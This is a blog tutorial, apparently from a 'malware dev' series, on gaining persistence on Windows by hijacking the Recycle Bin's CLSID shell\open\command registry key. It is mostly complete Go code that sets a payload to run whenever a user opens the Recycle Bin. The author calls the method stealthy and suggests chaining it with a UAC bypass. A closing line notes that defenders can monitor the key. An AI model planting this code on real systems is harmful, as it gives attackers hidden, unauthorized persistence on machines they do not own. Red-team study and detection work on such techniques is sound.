Introduction
Hello dear hackers!
Today we’re gonna see an effective technique to mantain access in Windows systems during red team operations just by modifying a registry key which interacts with the Recycle Bin. I don’t know if any APT group uses this technique but I read about it in a vxunderground paper (see here) and I thought it may be interesting to try in Golang so let’s see how it works
Explanation
In Windows there are some folders which have have uniques CLSID values like the ones for the “Recycle Bin” {645ff040-5081-101b-9f08-00aa002f954e} or the “My Documents” {450d8fba-ad25-11d0-98a8-0800361b1103}
All of this may sound familiar to you if you’ve ever tried the fodhelper.exe UAC bypass in which the registry HKCU is modified to execute commands as administrator without any confirmation.
Code
First of all we must import the necessary packages. In this case we’ll use the official Golang package to interact with registry keys
1
2
3
4
5
6
7
8
package main
import (
"fmt"
"log"
"golang.org/x/sys/windows/registry"
)
We have to open the CLSID registry key
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
...
bin_key, err := registry.OpenKey(
registry.LOCAL_MACHINE,
"SOFTWARE\\Classes\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell",
registry.WRITE, // Permissions
)
if err != nil {
fmt.Println("OpenKey error!")
log.Fatal(err)
}
defer bin_key.Close()
...
Then we create the new registry where our malicious commands will be
1
2
3
4
5
6
7
8
9
10
11
12
13
14
...
k, _, err := registry.CreateKey(
bin_key,
"open\\command",
registry.ALL_ACCESS,
)
if err != nil {
fmt.Println("CreateKey error!")
log.Fatal(err)
}
...
And finally we set the value, in our case it’s a simple notepad but you could be creative to combine it with other things like UAC bypass and more
1
2
3
4
5
6
7
8
...
err = k.SetStringValue("", "notepad.exe")
if err != nil {
log.Fatal(err)
}
...
Let’s add more output and the final code should be something like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
package main
/*
Author: D3Ext
Blog post: https://d3ext.github.io/posts/malware-dev-3/
*/
import (
"fmt"
"log"
"golang.org/x/sys/windows/registry"
)
func main(){
// Open registry key
fmt.Println("Opening registry key...")
bin_key, err := registry.OpenKey(
registry.LOCAL_MACHINE,
"SOFTWARE\\Classes\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell",
registry.WRITE,
)
if err != nil { // Handle error
fmt.Println("OpenKey error!")
log.Fatal(err)
}
// Close key
defer bin_key.Close()
// Create new key
fmt.Println("Creating new key...")
k, _, err := registry.CreateKey(
bin_key,
"open\\command",
registry.ALL_ACCESS,
)
if err != nil { // Handle error
fmt.Println("CreateKey error!")
log.Fatal(err)
}
// Set value
fmt.Println("Setting notepad.exe as our payload...")
err = k.SetStringValue("", "notepad.exe")
if err != nil { // Handle error
fmt.Println("SetStringValue error!")
log.Fatal(err)
}
fmt.Println("Process completed!")
}
Now we compile our payload and transfer it to our Windows testing machine
I haven’t read anywhere if this operation can be done without administrator privileges but testing in my Windows it always returned “Access denied”
Be careful with your payload because testing with cmd.exe and notepad, I created an infinite loop and I had to restart my PC
As you can see after clicking the recycle bin icon a notepad.exe appears
Now if we search the parent process id (PPID) of the notepad.exe we see that it’s executed under explorer.exe process
To revert our modifications you can simply execute this powershell command reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f and it should work for you
References
1
2
https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf
https://blog.amartinsec.com/posts/recyclebin/
Conclusion
This persistence technique can be useful for red teamers as it’s stealthy and everyone use the recycle bin to delete files so the payload would be executed whenever a user access to it. But the registry key can be monitored to prevent this so blue teamers should have this technique in mind
Source code here in my Github